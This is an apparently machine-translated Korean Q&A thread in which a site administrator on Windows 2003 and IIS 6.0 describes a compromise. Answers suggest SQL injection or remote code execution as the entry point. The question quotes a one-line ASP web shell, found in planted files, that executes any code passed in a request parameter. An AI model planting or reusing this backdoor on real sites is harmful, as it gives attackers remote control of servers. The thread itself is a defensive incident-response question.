2013-10-07 5 views
1

내 고객 중 한 명이 Google 검색 결과에 자신의 웹 사이트가 해킹 당했을 수 있다는 메시지를 보았습니다. 파고가 끝난 후, 서재응 쓰레기 및 자바 스크립트 참조가 포함 된 서버에서 html 파일을 발견했습니다. 나는이 라인나는 해킹 당했고 조언을 구하고 있다고 생각합니다.

<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile 

으로 해당 파일, CMS 암호를 변경할 등 CKFinder 같은 업데이트 된 일부 구성 요소 ... .ASP 파일의

내가 다음 서버에있는 다른 사이트에 찾기 시작 발견 톤 제거 나는 그것들을 제거했지만 그들이 어떻게 거기에 갔는지 모른다. 다양한 로그 (이벤트 뷰어, 웹 사이트, ftp)를 살펴 봤지만 대부분의 경우 파일이 생성 될 때부터 멀리 가지 않습니다.

한 달 또는 두 달 밖에 지나지 않은 OS를 업데이트하고 ftp 액세스를 변경했습니다.

입력 지점을 찾거나 내 서버와 사이트가 안전한지 확인하려면 어떻게해야합니까?

BTW : IIS 6.0을 실행하는 Windows 2003 서버입니다.

+0

윈도우 2003은 "한 달 또는 날짜 중 두"입니다 : 그 외에는

, 이번 주에 패치 된 윈도우 서버에 몇 가지 취약점이있다,이 링크를 체크 아웃? – geoffspear

+0

Windows 업데이트를 참조하는 중 ... – SirM

답변

0

서버에 액세스하는 데 여러 가지 방법이 있습니다.

공통 CMS 또는 사용자 지정을 실행하고 있습니까? 스크립트 중 하나에서 취약점을 발견했을 수도 있습니다.

예를 들어 SQL 주입 취약점을 발견하면 데이터베이스 정보를 검색 할 수 있습니다. RCE 버그 (원격 코드 실행)를 찾을 수있는 곳이라면 시스템 명령을 실행하여 임의의 파일을 생성 할 수 있었을 것입니다. http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html